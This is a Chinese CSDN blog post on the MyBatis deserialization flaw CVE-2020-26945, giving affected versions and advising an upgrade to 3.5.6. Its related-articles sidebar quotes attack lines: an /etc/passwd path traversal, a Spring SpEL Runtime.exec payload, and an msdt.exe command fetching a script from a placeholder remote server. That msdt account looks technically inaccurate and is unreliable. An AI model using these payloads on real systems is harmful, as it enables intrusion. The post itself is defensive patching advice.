CVE-2020-26945(Mybatis远程代码执行漏洞)

已于 2022-11-21 13:39:28 修改
阅读量1.8k 收藏
点赞数
分类专栏: 漏洞解决 文章标签: mybatis java
于 2022-11-21 13:32:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43210388/article/details/127962919
版权

参考链接:
MyBatis 远程代码执行漏洞(CVE-2020-26945)
Vulnerability Details : CVE-2020-26945

漏洞影响范围:
Mybatis < 3.5.6

漏洞级别:
阿里云ARMS显示高级
阿里云漏洞库显示中危
cvedetails评分:
在这里插入图片描述

备注:
CVSS得分基于一系列维度上的测量结果,这些测量维度被称为量度(Metrics)。
漏洞的最终得分最大为10,最小为0。
得分7~10的漏洞通常被认为比较严重
得分在4~6.9之间的是中级漏洞
得分0~3.9的则是低级漏洞

漏洞描述:
2020年10月6日,MyBatis官方发布了MyBatis 3.5.6版本,修复了一个远程代码执行漏洞,该漏洞编号为CVE-2020-26945。
3.5.6版本之前的MyBatis错误处理对象流的反序列化,攻击者通过此漏洞可以触发远程代码执行。

解决方案:
升级到3.5.6以及以上版本
如果使用的是mybatis-spring-boot-starter,可以直接点击进入看下,比如下面的2.2.2版本的
在这里插入图片描述
在这里插入图片描述

点进去可以看到已经是3.5.9版本了

一枝花傲寒
关注
专栏目录
CVE-2020-26945 —— MyBatis 远程代码执行漏洞
战神/calmness的博客
12-10 1226
目录 MyBatis组件介绍 描述 影响版本 过程 修复建议 CVE-2020-26945 | MyBatis 远程代码执行漏洞 MyBatis组件介绍 MyBatis 本是Apache的一个开源项目iBatis, 2010年这个项目由Apache Software Foundation 迁移到了Google Code,并且改名为MyBatisMyBatis是一款优秀的持久层框架,它支持定制化SQL、存储过程以及高级映射。MyBatis避免了几乎所有的JDBC代码和手动设置参数以及
框架漏洞-CVE复现-Node.JS+Jquery+Django+Flask
xiaoheizi的博客
07-18 853
Django采用了MTV的框架模式,即模型M,视图V和模版T,使用Django,程序员可以方便、快捷地创建高品质、易维护、数据库驱动的应用程序。访问:/admin/vuln/collection/?描述:Node.js-systeminformation是用于获取各种信息的Node.js模块,在存在命令注入漏洞的版本中,攻击者可以通过未过滤的参数注入payload执行系统命令。添加请求路径:/static/../../../a/../../../../etc/passwd 成功获取敏感信息。
MyBatis 远程代码执行漏洞CVE-2020-26945
aq_money的博客
06-21 4359
mybatis缓存 报错 MyBatis组件介绍 MyBatis 本是Apache的一个开源项目iBatis, 2010年这个项目由Apache Software Foundation 迁移到了Google Code,并且改名为MyBatisMyBatis是一款优秀的持久层框架,它支持定制化SQL、存储过程以及高级映射。MyBatis避免了几乎所有的JDBC代码和手动设置参数以及获取结果集。MyBatis可以使用简单的XML或注解来配置和映射原生信息,将接口和 Java 的 POJOs(Plain Ord
【第33章】MyBatis-Plus之预防安全漏洞
最新发布
zjg
07-13 801
软件漏洞可以对系统造成严重危害,如果被人恶意利用,会导致病毒感染、数据泄漏或损坏的风险,还可能面临直接或间接的经济损失。那么,我们应该如何预防这些漏洞呢?在深入探讨漏洞问题之前,首先需要明确什么是漏洞漏洞是指软件、系统或网络中存在的安全弱点或错误,这些弱点可能导致系统遭受攻击或被不当使用。在计算机安全领域,漏洞通常源于编程错误、设计缺陷或配置失误。对于对象关系映射(ORM)框架来说,漏洞通常指的是设计或实施中的安全问题,这些问题可能让应用程序面临SQL注入攻击的风险。SQL 注入漏洞
阿里云 MyBatis 远程代码执行漏洞CVE-2020-26945)修复
hvang1988的专栏
10-22 8161
阿里云 MyBatis 远程代码执行漏洞CVE-2020-26945)修复 1、漏洞详情 【安全通报】MyBatis 远程代码执行漏洞CVE-2020-26945)|NOSEC安全讯息平台 - 白帽汇安全研究院 波及 mybatis.jar版本 小于<3.5.6 2、漏洞利用前提条件 在满足以下三个条件的时候,攻击者可以触发远程代码执行: ​ 1、用户启用了内置的二级缓存 ​ 2、用户未设置JEP-290过滤器 ​ 3、攻击者找到了一种修改私有Map字段条目的方法, 即修改or
[CVE-2020-26945]mybatis二级缓存反序列化漏洞
公众号shadow sock7
10-14 2622
参考: https://github.com/mybatis/mybatis-3/compare/mybatis-3.5.5…mybatis-3.5.6 https://github.com/mybatis/mybatis-3/pull/2079 CVE-2020-26945 mybatis二级缓存反序列化的分析与复现
安装达梦 8.1.2.192,mybatis-3.4.2.jar文件 高危漏洞 CVE-2020-26945 涉及图形界面工具和DEM
curating的博客
06-30 1159
安装达梦 8.1.192,mybatis-3.4.2.jar文件 高危漏洞 CVE-2020-26945 测试mybatis-3.5.13.jar替换可用
框架安全-CVE 复现&Spring&Struts&Laravel&ThinkPHP漏洞复现
zz12345600354的博客
04-26 697
目录 服务攻防-框架安全&CVE 复现&Spring&Struts&Laravel&ThinkPHP * 概述 PHP-开发框架安全-Thinkphp&Laravel * 漏洞复现 * Thinkphp-3.X RCE Thinkphp-5.X RCE Laravel框架安全问题- CVE-2021-3129 RCE JAVAWEB-开发框架安全-Spring&Struts2 * Struts2框架安全
Spring Cloud 爆高危漏洞,老板给你打电话了没?
公众号:微观技术
03-14 268
大家好!我是Tom哥互联网时代,微服务盛行,为了整合生态,Spring Cloud 横空出世。之前Tom哥还写过一篇全家桶文章《【万字长文】创业公司就应该技术选型 Spring Cloud Alibaba , 开箱即用》正所谓 “成也萧何,败也萧何”, 这货提供了便利同时,也经常捅个篓子。这不刚刚又爆出个漏洞Spring Cloud 突发漏洞Log4j2 的核弹级漏洞刚告一段落,Spring Cloud Gateway 又突发高危漏洞,又得折腾了。。。2022年3月1日,Spring官方
框架漏洞-CVE复现-ThinkPHP+Laravel+Struts+Spring
xiaoheizi的博客
07-16 417
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("要执行的命令")就是别人写好包装起来的一套工具,把你原先必须要写的,必须要做的一些复杂的东西都写好了放在那里,你只要调用他的方法,就可以实现一些本来要费好大劲的功能。工具:https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP。我要执行的是反弹shell命令,需要先对命令进行编码。
mybatis-3.3.0jar包
06-06
mybatis-3.3.0版本所需要的jar包,都在里面,搭建mybatis环境方法可以参考我的博客:http://blog.csdn.net/eson_15/article/details/51592608
mybatis +号_【最新漏洞简讯】MyBatis 远程代码执行漏洞CVE202026945
weixin_39872222的博客
12-24 752
↑ 点击上方“SecMind安全管家”关注我们情报编号:情报编号:W1520201014漏洞概述MyBatis 本是Apache的一个开源项目iBatis, 2010年这个项目由Apache Software Foundation 迁移到了Google Code,并且改名为MyBatisMyBatis是一款优秀的持久层框架,它支持定制化SQL、存储过程以及高级映射。MyBati...
mybatis日期范围查询_MyBatis 远程代码执行漏洞CVE202026945漏洞分析
weixin_39624716的博客
12-05 256
漏洞概要 漏洞名称:MyBatis 远程代码执行漏洞CVE-2020-26945威胁等级:高危影响范围:MyBatis < 3.5.6漏洞类型:远程代码执行利用难度:困难 漏洞分析 2.1 MyBatis组件介绍MyBatis 本是Apache的一个开源项目iBatis, 2010年这个项目由Apache Software Foundation 迁移到了Go...
CVE-2020-26258 / 26259:XStream反序列化漏洞公告
爱国小白帽
12-17 1195
报告编号:B6-2020-121401 报告来源:360CERT 报告作者:360CERT 更新日期:2020-12-14 0x01漏洞简述 2020年12月14日,360CERT监测发现 XStream 发布了 XStream 反序列化漏洞 的风险提示,突破编号为 CVE-2020-26259,CVE-2020-26258 ,突破等级:高危,裂缝评分:8.9。 在运行 XSteam 的服务上,未授权的远程攻击者通过 构造特定的序列化数据 ,可造成 任意文件删除/ 服务端请求伪造 。 目前该突.
日常常见应用组件升级记录
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
01-18 2070
因近期安全扫描,发现java后端应用涉及多个引用组件版本过低,涉及潜在漏洞利用风险,特记录相关处理升级处理过程,以备后续确认;
jar升级解决安全漏洞 与 maven的jar包版本的依赖关系
进化的深山猿
05-24 3074
今天被告知系统存在安全漏洞,需要解决下,记录下过程。 漏洞说明 说明:mybatis 在3.5.6以下的版本存在CVE-2020-26945漏洞,所以需要进行升级 但是我们的项目是springboot项目,通过mybatis-spring-boot-starter引入的mybatis,所以就需要知道把mybatis-spring-boot-starter的版本调整到什么级别,以及和mybatis版本之间的依赖关系。 mybatis 3.5.6解决了该漏洞 但是项目是springboot项目,引入的是
博客使用方法
justwaityou1314的博客
06-09 1803
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
maven项目中,添加依赖后,出现"Dependency 'xxxx‘ not found"解决方案
热门推荐
夏虫的博客
04-12 1万+
我是刚更换完jdk,jdk9换成jdk8.出现这样的错误 如果你是这样移至1,不是则移至2. 1.按照这四张图操作一遍就可以了。 路径按照你的安装目录来 2.我的最开始按下面链接里做的,没成功。不过你可以试试。 maven项目中,添加依赖后,出现"Dependency 'xxxx‘ not found"解决过程 ...
cve-2022-30190 msdt远程代码执行漏洞复现
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞的复现过程。 首先,我们需要使用攻击者控制的远程服务器,以便在受影响的目标系统上执行恶意代码。我们创建以下PHP脚本,将其上传到我们的远程服务器上: ``` <?php system('calc.exe'); ?> ``` 这段代码将在目标系统上执行计算器应用程序,然后我们将通过"msdt.exe"命令行工具的特定参数利用该漏洞。 在受影响的目标系统上,我们将打开命令提示符,并执行以下命令: ``` msdt.exe "http://your-remote-server.com/evil-script.php" /id "netwoCpl" /showUI ``` 上述命令将启动"msdt.exe"并使用指定的URL作为参数,同时还指定了"networkCpl"作为"msdt.exe"的标识符。最后,使用"/showUI"参数显示用户界面。 当目标系统执行此命令时,"msdt.exe"会检索远程服务器上的脚本文件,并尝试执行该脚本。由于脚本文件具有恶意代码,它将在目标系统上执行计算器应用程序。 这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单复现过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更复杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以修补此漏洞。还应该维护良好的网络安全措施,以减少被利用的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值